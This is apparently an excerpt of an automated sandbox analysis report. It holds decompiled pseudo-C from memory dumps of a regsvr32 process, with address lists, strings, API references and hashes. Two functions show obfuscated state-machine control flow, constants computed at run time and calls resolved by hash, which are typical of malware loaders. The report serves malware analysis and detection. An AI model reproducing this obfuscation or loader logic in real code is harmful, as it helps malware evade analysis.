									_v20 = _v20 ^ 0x6d63fb89;
									_v20 = 0x83a424;
									_v20 = _v20 + 0xea81;
									_v20 = _v20 ^ 0x008f6cba;
									_v32 = 0x446dfe;
									_v32 = _v32 << 2;
									_v32 = _v32 + 0xffff5702;
									_v32 = _v32 ^ 0x011475a8;
									_v20 = 0xc11a87;
									_v20 = _v20 >> 0x10;
									_v20 = _v20 ^ 0x00017d51;
									_v32 = 0x690f94;
									_v32 = _v32 << 5;
									_v32 = _v32 + 0xabd;
									_v32 = _v32 ^ 0x0d2941f7;
									goto L1;
								} else {
									if(_t965 == 0xe534) {
										_v36 = 0xf17bca;
										_v36 = _v36 >> 1;
										_v36 = _v36 ^ 0x007f48dd;
										_v32 = 0x10add1;
										_v32 = _v32 ^ 0x9e99d9f9;
										_v32 = _v32 ^ 0x9e8a2056;
										_v48 = 0xf852c7;
										_v48 = _v48 ^ 0xb46743f3;
										_v48 = _v48 << 0xb;
										_v48 = _v48 ^ 0x4851e3bf;
										_v48 = _v48 ^ 0xb0dfa285;
										E04F69A95(_v36, _v32, _v48, _t791);
										_t965 = 0x799a4;
										while(1) {
											L1:
											_t791 = _v56;
											goto L2;
										}
									} else {
										if(_t965 == _t871) {
											__eflags = E04F691D6(_t963, _a20);
											_t965 = 0x4e289;
											_t802 = 1;
											_t869 =  !=  ? _t802 : _t869;
											while(1) {
												L1:
												_t791 = _v56;
												goto L2;
											}
										} else {
											if(_t965 == 0x34bd9) {
												_v32 = 0xe13f1e;
												_v32 = _v32 ^ 0x97103e17;
												_v32 = _v32 ^ 0x97f1011a;
												_t803 = E04F72EDA(_t963, _v32, __eflags);
												_v36 = 0xf269a7;
												_v36 = _v36 << 1;
												_v36 = _v36 >> 8;
												_v36 = _v36 ^ 0x0001e41b;
												__eflags = _t803 - _v36;
												_t791 = _v56;
												_t871 = 0x26824;
												_t965 =  ==  ? 0x26824 : 0x4e289;
												goto L3;
											} else {
												if(_t965 == 0x3f787) {
													_v32 = 0xaf9976;
													_v32 = _v32 >> 0x10;
													_v32 = _v32 ^ 0x000000af;
													_v40 = 0x8142c;
													_t912 = 0x73;
													_v40 = _v40 / _t912;
													_v40 = _v40 ^ 0x000b3828;
													_v36 = 0x2fb37c;
													_v36 = _v36 << 0x10;
													_v36 = _v36 >> 0xb;
													_v36 = _v36 ^ 0x0014dc06;
													_v48 = 0x25f5d2;
													_v48 = _v48 + 0xffffe523;
													_v48 = _v48 | 0xa0ab6aef;
													_v48 = _v48 + 0x5437;
													_v48 = _v48 ^ 0xa0b6586b;
													_v52 = 0x58b8e8;
													_v52 = _v52 + 0xc241;
													_v52 = _v52 ^ 0x8196d7c1;
													_v52 = _v52 + 0x5595;
													_v52 = _v52 ^ 0x81d60a0d;
													_t807 = E04F7A036(_v40, _v32, _t912, _t912, _v36, _v48, _v52);
													_v32 = 0x5a2c59;
													__eflags = _t807;
													_v8 = _t807;
													_t965 =  !=  ? 0x872bb : 0xafe8a;
													_v32 = _v32 * 0x43;
													_v32 = _v32 ^ 0x179b55b5;
													_v52 = 0x19d1fd;
													_v52 = _v52 >> 0xa;
													_v52 = _v52 + 0xffff283f;
													_v52 = _v52 >> 2;
													_v52 = _v52 ^ 0x3ff03443;
													_v48 = 0xd572e8;
													_v48 = _v48 * 0x3c;
													_v48 = _v48 * 7;
													_v48 = _v48 << 3;
													_v48 = _v48 ^ 0xf18d2f05;
													E04F7E4B2(_v32, _v52, _t807, _v48, 0);
													_t974 =  &(_t974[9]);
													goto L39;
												} else {
													if(_t965 == 0x4e289) {
														_v40 = 0x67d3b0;
														_v40 = _v40 ^ 0x0032bffd;
														_v40 = _v40 ^ 0x005da0ed;
														_v32 = 0xb10a4d;
														_v32 = _v32 | 0x68d50b46;
														_v32 = _v32 ^ 0x68f9cb50;
														_v36 = 0xf9746b;
														_v36 = _v36 | 0x0652e1a0;
														_v36 = _v36 >> 0xf;
														_v36 = _v36 ^ 0x000bbaa6;
														E04F69A95(_v40, _v32, _v36, _t963);
														goto L12;
													}
												}
											}
										}
									}
								}
								L40:
								_t791 = _v56;
								__eflags = _t965 - 0xafe8a;
							} while (__eflags != 0);
							return _t869;
						}
					}
				}
			}

0x04f65da4
0x04f65dab
0x04f65dad
0x04f65dae
0x04f65db2
0x04f65db6
0x04f65dba
0x04f65dbe
0x04f65dc2
0x04f65dc6
0x04f65dca
0x04f65dce
0x04f65dcf
0x04f65dd0
0x04f65dd5
0x04f65dde
0x04f65de1
0x04f65de5
0x04f65ded
0x04f65df2
0x04f65df4
0x04f65df4
0x04f65df4
0x04f65df8
0x04f65df8
0x04f65df8
0x04f65dfd
0x04f65dfd
0x04f65dfd
0x04f65e02
0x04f65e02
0x04f65e02
0x04f65e02
0x04f65e08
0x00000000
0x00000000
0x04f662ae
0x04f662b4
0x04f66bcb
0x04f66bd3
0x04f66bdb
0x04f66be7
0x04f66bef
0x04f66bf7
0x04f66bfc
0x04f66c01
0x04f66c09
0x04f66c16
0x04f66c1a
0x04f66c1a
0x04f66c1a
0x04f66c2e
0x04f66c35
0x04f66c3a
0x04f66c3a
0x04f66c3f
0x04f662ba
0x04f662ba
0x04f662c0
0x04f66bc1
0x00000000
0x04f662c6
0x04f662c6
0x04f662c8
0x04f66a4d
0x04f66a57
0x04f66a5c
0x04f66a64
0x04f66a6c
0x04f66a74
0x04f66a7c
0x04f66a84
0x04f66a8c
0x04f66a94
0x04f66aa2
0x04f66aa7
0x04f66ab1
0x04f66ab4
0x04f66ab5
0x04f66ab9
0x04f66ac1
0x04f66ac9
0x04f66ace
0x04f66ad3
0x04f66adb
0x04f66ae3
0x04f66aeb
0x04f66af0
0x04f66af8
0x04f66b0e
0x04f66b12
0x04f66b17
0x04f66b1f
0x04f66b27
0x04f66b2f
0x04f66b37
0x04f66b3f
0x04f66b47
0x04f66b4f
0x04f66b57
0x04f66b5f
0x04f66b67
0x04f66b6f
0x04f66ba1
0x04f66ba6
0x04f66ba9
0x04f66bad
0x04f66bb9
0x00000000
0x04f662ce
0x04f662ce
0x04f662d4
0x04f6696d
0x04f66975
0x04f6697a
0x04f66982
0x04f66987
0x04f6698f
0x04f66997
0x04f669a4
0x04f669a8
0x04f669b0
0x04f669b8
0x04f669c0
0x04f669cd
0x04f669d1
0x04f669d9
0x04f669e1
0x04f669e5
0x04f669ed
0x04f669f5
0x04f669fd
0x04f66a05
0x04f66a08
0x04f66a0a
0x04f66a11
0x04f66a11
0x04f66a0c
0x04f66a0c
0x04f66a0c
0x04f66a30
0x04f66a35
0x04f66a3a
0x04f66a42
0x04f65df4
0x04f65df4
0x04f65df4
0x00000000
0x04f65df4
0x04f662da
0x04f662df
0x04f662e1
0x04f662e7
0x04f662eb
0x04f66388
0x04f662f1
0x04f662f1
0x04f66301
0x04f66304
0x04f66308
0x04f66310
0x04f66318
0x04f6631d
0x04f66325
0x04f6632d
0x04f66335
0x04f6633d
0x04f66342
0x04f6634a
0x04f66352
0x04f66356
0x04f6635b
0x04f66378
0x04f6637d
0x04f6637f
0x04f66382
0x04f66382
0x04f6638c
0x04f66396
0x04f6639e
0x04f663a3
0x04f663ab
0x04f663b3
0x04f663bb
0x04f663c3
0x04f663d1
0x04f663d6
0x04f663dc
0x04f663e4
0x04f663f0
0x04f663f5
0x04f663fb
0x04f66407
0x04f6640c
0x04f66412
0x04f6641a
0x04f66422
0x04f6642e
0x04f66433
0x04f66439
0x04f6643e
0x04f66446
0x04f6644e
0x04f66456
0x04f6645e
0x04f66466
0x04f6646b
0x04f66473
0x04f6647f
0x04f66484
0x04f6648e
0x04f66493
0x04f66499
0x04f664a1
0x04f664a9
0x04f664b6
0x04f664b7
0x04f664bb
0x04f664c3
0x04f664d1
0x04f664d5
0x04f664dd
0x04f6650c
0x04f66510
0x04f66510
0x04f66512
0x04f66514
0x04f6651e
0x04f66526
0x04f6652e
0x04f6653a
0x04f66546
0x04f6654a
0x04f66552
0x04f6655a
0x04f66562
0x04f6656a
0x04f66572
0x04f66586
0x04f66586
0x04f66586
0x04f66588
0x04f66592
0x04f6659a
0x04f665a2
0x04f665aa
0x04f665b2
0x04f665ba
0x04f665c2
0x04f665ca
0x04f665d2
0x04f665db
0x04f665e7
0x04f665e8
0x04f665ee
0x04f665f6
0x04f665fe
0x04f66606
0x04f6660e
0x04f6661a
0x04f66622
0x04f66627
0x04f6662f
0x04f66637
0x04f6663f
0x04f66644
0x04f6664c
0x04f66654
0x04f6665c
0x04f66664
0x04f66690
0x04f66695
0x04f6669d
0x04f6669f
0x04f666a7
0x04f666af
0x04f666b7
0x04f666bf
0x04f666c4
0x04f666cc
0x04f666d4
0x04f666d9
0x04f666e1
0x04f666ee
0x04f666f2
0x04f6670f
0x04f66714
0x04f66717
0x04f66719
0x04f65ea9
0x04f65ea9
0x04f65df4
0x04f65df4
0x04f65df4
0x00000000
0x04f65df4
0x04f6671f
0x04f66724
0x04f66728
0x04f66730
0x04f6673a
0x04f6673e
0x04f66746
0x04f6674e
0x04f66756
0x04f6675e
0x04f6676b
0x04f66773
0x04f6677b
0x04f66783
0x04f6678b
0x04f66793
0x04f6679b
0x04f667a3
0x04f667ab
0x04f667b0
0x04f667cf
0x04f667d4
0x04f667d7
0x04f667d9
0x04f667df
0x04f667eb
0x04f667f7
0x04f667ff
0x04f66807
0x04f6680f
0x04f66817
0x04f6681f
0x04f66827
0x04f6682f
0x04f66834
0x04f6683c
0x04f66844
0x04f6684c
0x04f66850
0x04f66855
0x04f6685d
0x04f66865
0x04f6686d
0x04f6688b
0x04f66890
0x04f6689a
0x04f668a2
0x04f668a7
0x04f668af
0x04f668b7
0x04f668c4
0x04f668c8
0x04f668d0
0x04f668d8
0x04f668e0
0x04f668ea
0x04f668f2
0x04f668fa
0x04f66902
0x04f6690a
0x04f66912
0x04f6691a
0x04f66922
0x04f6692a
0x04f66932
0x04f6693a
0x04f6693a
0x04f6693a
0x04f6695b
0x04f66960
0x04f66960
0x04f66963
0x04f65df4
0x04f65df4
0x04f65df4
0x04f65df8
0x04f65df8
0x04f65dfd
0x04f65dfd
0x00000000
0x04f65dfd
0x04f65df4
0x04f66719
0x04f662e1
0x04f662d4
0x04f662c8
0x04f662c0
0x00000000
0x04f662b4
0x04f65e0e
0x04f660e2
0x04f660ec
0x04f660f4
0x04f660f9
0x04f660fe
0x04f66106
0x04f6610e
0x04f66116
0x04f6611b
0x04f66123
0x04f6612b
0x04f66133
0x04f6613b
0x04f66143
0x04f6614b
0x04f66153
0x04f6615b
0x04f66163
0x04f66171
0x04f66176
0x04f6617c
0x04f66184
0x04f6618c
0x04f66199
0x04f6619a
0x04f6619e
0x04f661a3
0x04f661ab
0x04f661b3
0x04f661bb
0x04f661c3
0x04f661c8
0x04f661cd
0x04f661d5
0x04f661dd
0x04f661e5
0x04f661ea
0x04f661f2
0x04f661fa
0x04f66205
0x04f66209
0x04f66211
0x04f6621e
0x04f66222
0x04f6622a
0x04f66232
0x04f6623a
0x04f66242
0x04f6624a
0x04f66252
0x04f6625a
0x04f66262
0x04f66267
0x04f6626f
0x04f66277
0x04f6627f
0x04f66284
0x04f6628c
0x04f66294
0x04f66299
0x04f662a1
0x00000000
0x04f65e14
0x04f65e1a
0x04f66073
0x04f6607b
0x04f6607f
0x04f66087
0x04f6608f
0x04f66097
0x04f6609f
0x04f660a7
0x04f660af
0x04f660b4
0x04f660bc
0x04f660d1
0x04f660d8
0x04f65df4
0x04f65df4
0x04f65df4
0x00000000
0x04f65df4
0x04f65e20
0x04f65e22
0x04f66061
0x04f66063
0x04f6606a
0x04f6606b
0x04f65df4
0x04f65df4
0x04f65df4
0x00000000
0x04f65df4
0x04f65e28
0x04f65e2e
0x04f65ffc
0x04f66006
0x04f6600e
0x04f6601a
0x04f6601f
0x04f66029
0x04f66032
0x04f66037
0x04f66043
0x04f66045
0x04f66049
0x04f6604e
0x00000000
0x04f65e34
0x04f65e3a
0x04f65eb3
0x04f65ebd
0x04f65ec2
0x04f65eca
0x04f65ed8
0x04f65edb
0x04f65edf
0x04f65ee7
0x04f65eef
0x04f65ef4
0x04f65ef9
0x04f65f01
0x04f65f09
0x04f65f11
0x04f65f19
0x04f65f21
0x04f65f29
0x04f65f31
0x04f65f39
0x04f65f41
0x04f65f49
0x04f65f67
0x04f65f6c
0x04f65f74
0x04f65f76
0x04f65f84
0x04f65f8e
0x04f65f92
0x04f65f9a
0x04f65fa2
0x04f65fa7
0x04f65faf
0x04f65fb4
0x04f65fbc
0x04f65fc9
0x04f65fd2
0x04f65fd6
0x04f65fdb
0x04f65fef
0x04f65ff4
0x00000000
0x04f65e3c
0x04f65e42
0x04f65e48
0x04f65e50
0x04f65e58
0x04f65e60
0x04f65e68
0x04f65e70
0x04f65e78
0x04f65e80
0x04f65e88
0x04f65e8d
0x04f65ea2
0x00000000
0x04f65ea8
0x04f65e42
0x04f65e3a
0x04f65e2e
0x04f65e22
0x04f65e1a
0x04f66c44
0x04f66c44
0x04f66c48
0x04f66c48
0x04f66c5d
0x04f66c5d
0x04f65dfd
0x04f65df8

Strings

v5, xrefs: 04F6617C
cfIW, xrefs: 04F66222
*T@, xrefs: 04F6674E
Y, xrefs: 04F665DB
u9$, xrefs: 04F66844
n:, xrefs: 04F66ADB
C\, xrefs: 04F66AB9
,,, xrefs: 04F66834
<o, xrefs: 04F668FA
BZW6, xrefs: 04F6697A
EO\, xrefs: 04F6675E
\r, xrefs: 04F66B3F
RbF, xrefs: 04F66562

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *T@$,,$BZW6$C\$EO\$RbF$Y$\r$cfIW$u9$$v5$<o$n:
API String ID: 0-3539388274
Opcode ID: b2f103fc897351953d46dc9f31e958f4713722a29730e3d82504b728d3a770e4
Instruction ID: 67e80ca049fca2f7bd9e1a76b1e9e1019ed00ea97b2e69686ce868a960563707
Opcode Fuzzy Hash: b2f103fc897351953d46dc9f31e958f4713722a29730e3d82504b728d3a770e4
Instruction Fuzzy Hash: F282FF72409340AFD388CF25C58A40BBBE1FBC8758F545A1DF5CAA6260D3B5DA49CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 10019164 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 212
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10019164(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				void* _t51;
				int _t52;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x1002f7b0);
				E10012CE0(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10014CDE(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1003a4d0; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1003a5b4 = 0;
				 *0x10037c0c =  *0x10037c0c | 0xffffffff;
				 *0x10037c00 =  *0x10037c00 | 0xffffffff;
				_t87 = E1001B17B("TZ");
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1003a5b8; // 0x0
					__eflags = _t21;
					if(_t21 != 0) {
						_push(_t21);
						E1001111B();
						 *0x1003a5b8 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1003a508);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1003a5b4 = 1;
						_t26 = 0x1003a508->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x10037b68 = _t27;
						__eflags =  *0x1003a54e; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1003a55c; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x10037b68 = _t39;
						}
						__eflags =  *0x1003a5a2; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x10037b6c = 0;
							 *0x10037b70 = 0;
							goto L23;
						} else {
							_t36 =  *0x1003a5b0; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x10037b6c = 1;
							 *0x10037b70 = (_t36 -  *0x1003a55c) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1003a50c, 0xffffffff,  *0x10037bf8, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x10037bf8; // 0x10037b78
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1003a560, 0xffffffff,  *0x10037bfc, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x10037bfc; // 0x10037bb8
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x10037bfc; // 0x10037bb8
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x10037bf8; // 0x10037b78
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1003a5b8; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E10011233(E10012000(_t87) + 1);
						 *0x1003a5b8 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E10010E5E(_t90 - 0x10, 0xffffffff);
							L47:
							return E10012D1B(_t24);
						}
						E10018100(_t44, _t87);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001937F();
						E10019990( *0x10037bf8, _t87, 3);
						_t48 =  *0x10037bf8; // 0x10037b78
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						 *0x10037b68 = E1001144B(_t89) * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x10037b68 =  ~( *0x10037b68);
							}
							_t52 =  *_t89;
							 *0x10037b6c = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x10037bfc; // 0x10037bb8
								 *_t24 = 0;
							} else {
								E10019990( *0x10037bfc, _t89, 3);
								_t24 =  *0x10037bfc; // 0x10037bb8
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						 *0x10037b68 =  *0x10037b68 + E1001144B(_t89) * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x10037b68 =  *0x10037b68 + E1001144B(_t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10018070(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1003a5b8; // 0x0
						if(_t60 != 0) {
							_push(_t60);
							E1001111B();
						}
						goto L6;
					}
				}
			}

0x10019164
0x10019166
0x1001916b
0x10019172
0x10019177
0x1001917d
0x10019180
0x10019186
0x10019189
0x1001918f
0x10019196
0x100191a8
0x100191aa
0x100191af
0x1001926d
0x10019272
0x10019274
0x10019276
0x10019277
0x1001927d
0x1001927d
0x10019288
0x1001928e
0x10019291
0x00000000
0x10019297
0x1001929a
0x100192a0
0x100192a5
0x100192a8
0x100192ad
0x100192b4
0x100192b6
0x100192bf
0x100192bf
0x100192c1
0x100192c1
0x100192c6
0x100192cd
0x100192ee
0x100192ee
0x100192f4
0x00000000
0x100192cf
0x100192cf
0x100192d4
0x100192d6
0x00000000
0x00000000
0x100192d8
0x100192e7
0x100192fa
0x10019316
0x10019318
0x1001931a
0x1001932c
0x1001932c
0x10019331
0x10019334
0x1001934a
0x1001934c
0x1001934e
0x10019360
0x10019360
0x10019365
0x00000000
0x10019365
0x10019350
0x10019353
0x00000000
0x00000000
0x10019355
0x1001935a
0x00000000
0x1001935a
0x1001931c
0x1001931f
0x00000000
0x00000000
0x10019321
0x10019326
0x00000000
0x10019326
0x100192cd
0x100191be
0x100191be
0x100191c5
0x100191e8
0x100191f0
0x100191f7
0x100191fe
0x10019368
0x1001936e
0x10019406
0x1001940b
0x1001940b
0x10019206
0x1001920d
0x10019211
0x1001921f
0x10019227
0x1001922c
0x10019230
0x10019236
0x10019238
0x1001923f
0x1001923f
0x1001924d
0x10019254
0x10019254
0x10019258
0x00000000
0x00000000
0x1001926a
0x1001926a
0x10019388
0x1001938b
0x100193cb
0x100193cb
0x100193ce
0x100193d0
0x100193d0
0x100193d6
0x100193d9
0x100193de
0x100193e0
0x100193fe
0x10019403
0x100193e2
0x100193eb
0x100193f3
0x100193f8
0x100193f8
0x00000000
0x100193e0
0x1001938d
0x10019398
0x100193a5
0x100193a5
0x100193a7
0x100193a9
0x00000000
0x00000000
0x100193a0
0x100193a2
0x00000000
0x00000000
0x100193a4
0x100193a4
0x100193a4
0x100193ab
0x100193ae
0x00000000
0x00000000
0x100193b0
0x100193b8
0x100193c5
0x100193c5
0x100193c7
0x100193c9
0x00000000
0x00000000
0x100193c0
0x100193c2
0x00000000
0x00000000
0x100193c4
0x100193c4
0x100193c4
0x00000000
0x100193c5
0x100191d2
0x00000000
0x100191d8
0x100191d8
0x100191df
0x100191e1
0x100191e2
0x100191e7
0x00000000
0x100191df
0x100191d2

APIs

__lock.LIBCMT ref: 10019177

Part of subcall function 10014CDE: EnterCriticalSection.KERNEL32(?,?,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?), ref: 10014D06

_strlen.LIBCMT ref: 100191E9
_strcat.LIBCMT ref: 10019206
_strncpy.LIBCMT ref: 1001921F

Part of subcall function 1001111B: __lock.LIBCMT ref: 10011139
Part of subcall function 1001111B: RtlFreeHeap.NTDLL(00000000,?,1002E808,0000000C,10014CC2,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010), ref: 10011180

GetTimeZoneInformation.KERNEL32(1003A508,1002F7B0,00000018,10019779,1002F7C0,00000008,100136D4,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10019288
WideCharToMultiByte.KERNEL32(00000000,00000000,1003A50C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10019316
WideCharToMultiByte.KERNEL32(00000000,00000000,1003A560,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 1001934A

Strings

@hvpYv, xrefs: 10019310

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
String ID: @hvpYv
API String ID: 3757401926-2766943729
Opcode ID: a3a12b6914afff0b4e7b31ad668b4ace3caeeea21f36db9566a54eb37af1babf
Instruction ID: 4dbca8054f4039b4849f5a9e5fe9b23a7014a1c273ae3838594a4a591fb459e4
Opcode Fuzzy Hash: a3a12b6914afff0b4e7b31ad668b4ace3caeeea21f36db9566a54eb37af1babf
Instruction Fuzzy Hash: C771B774C04661AEE726CB28CC85B99BBF4FB46750F60011AE4A4DF2E2D730DAC2CB15

Uniqueness

Uniqueness Score: -1.00%

Function 04F6E942 Relevance: 15.7, Strings: 12, Instructions: 714
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E04F6E942(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr* _v292;
				char* _v296;
				intOrPtr _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				void* _t765;
				signed int _t770;
				void* _t774;
				void* _t781;
				void* _t784;
				signed int _t790;
				void* _t795;
				void* _t804;
				signed int _t817;
				signed int _t836;
				signed int _t863;
				int _t874;
				signed int _t878;
				signed int _t880;
				signed int _t884;
				signed int _t886;
				signed int _t888;
				signed int _t890;
				signed int _t893;
				signed int _t895;
				signed int _t896;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t906;
				signed int _t907;
				signed int _t910;
				signed int _t916;
				signed int _t919;
				signed int _t921;
				signed int _t922;
				signed int _t924;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t951;
				signed int _t987;
				void* _t988;
				intOrPtr* _t991;
				signed int _t995;
				signed int* _t996;
				signed int* _t997;
				void* _t1001;

				_t996 =  &_v336;
				_v304 = __edx;
				_t991 = __ecx;
				_t878 = _v304;
				_t765 = 0xbb417;
				_t995 = _v304;
				_t987 = _v304;
				_v292 = __ecx;
				_v300 = 0xc9d3c;
				while(1) {
					L1:
					_t884 = 0x44;
					do {
						while(1) {
							L2:
							_t1001 = _t765 - 0x9dc69;
							if(_t1001 <= 0) {
								break;
							}
							__eflags = _t765 - 0xb7083;
							if(__eflags == 0) {
								_t987 = _t987 +  *((intOrPtr*)(_t991 + 4));
								_v336 = 0x611b88;
								_v336 = _v336 ^ 0x03dc96dd;
								_v336 = _v336 + 0xb7b1;
								_v336 = _v336 << 0xf;
								_v336 = _v336 ^ 0x2287cd29;
								_v332 = 0x61ea12;
								_push(_t884);
								_v332 = _v332 / _t884;
								_v332 = _v332 + 0xffffb780;
								_v332 = _v332 ^ 0x000832dd;
								_t770 = E04F73EE6(_t884, _t987, __eflags);
								_v308 = _t770;
								__eflags = _t770;
								if(__eflags == 0) {
									_t765 = 0x6d02a;
									_t884 = 0x44;
									goto L29;
								} else {
									_t765 = 0xeddf3;
									while(1) {
										L1:
										_t884 = 0x44;
										goto L2;
									}
								}
							} else {
								__eflags = _t765 - 0xbb417;
								if(__eflags == 0) {
									_t765 = 0x9dc69;
									continue;
								} else {
									__eflags = _t765 - 0xd28ed;
									if(_t765 == 0xd28ed) {
										_v336 = 0x54cc37;
										_v336 = _v336 * 6;
										_v336 = _v336 * 0x6c;
										_v336 = _v336 ^ 0xd6ab1a20;
										_v332 = 0xbf6807;
										_v332 = _v332 ^ 0x28017bf2;
										_v332 = _v332 >> 1;
										_v332 = _v332 ^ 0x14542449;
										_v316 = 0x438805;
										_v316 = _v316 << 0xf;
										_v316 = _v316 ^ 0xc40ef689;
										_v324 = 0x383e5d;
										_v324 = _v324 + 0xffff5ee2;
										_v324 = _v324 ^ 0x003f3b9e;
										_t774 = E04F7D6A7(_v336, _v332, _v316, 0x4f610a0, _v324);
										_push( &_v256);
										_push(_t774);
										_push(_t987);
										_push(_t995);
										 *((intOrPtr*)(E04F79F15(_v336, 0xb1d024bf, 0x101)))();
										_v328 = 0x9e2a50;
										_v328 = _v328 << 0xb;
										_v328 = _v328 | 0xe137aec6;
										_v328 = _v328 ^ 0xf1746b58;
										_v336 = 0x8ce25;
										_v336 = _v336 + 0x4283;
										_v336 = _v336 ^ 0x8c29283c;
										_v336 = _v336 >> 1;
										_v336 = _v336 ^ 0x461f28d8;
										_v324 = 0xd10b21;
										_v324 = _v324 >> 1;
										_v324 = _v324 ^ 0x006fa0b4;
										_v332 = 0x7cb53e;
										_v332 = _v332 >> 9;
										_v332 = _v332 << 8;
										_v332 = _v332 ^ 0x003faf70;
										E04F6845B(_v328, _v336, _v324, _v332, _t774);
										_t996 =  &(_t996[0xa]);
										_t765 = 0xb7083;
										goto L23;
									} else {
										__eflags = _t765 - 0xe3b57;
										if(_t765 == 0xe3b57) {
											_v332 = 0x4d444c;
											_v332 = _v332 >> 0xa;
											_v332 = _v332 ^ 0x92116366;
											_v332 = _v332 ^ 0x921fd999;
											_v336 = 0x798ddc;
											_v336 = _v336 >> 6;
											_t916 = 0x63;
											_push(0x4f61000);
											_v336 = _v336 / _t916;
											_v336 = _v336 ^ 0x15f31a71;
											_v336 = _v336 ^ 0x15f9f7ca;
											_t781 = E04F7B0A4(_v332, _v336);
											_v336 = 0x62c9ac;
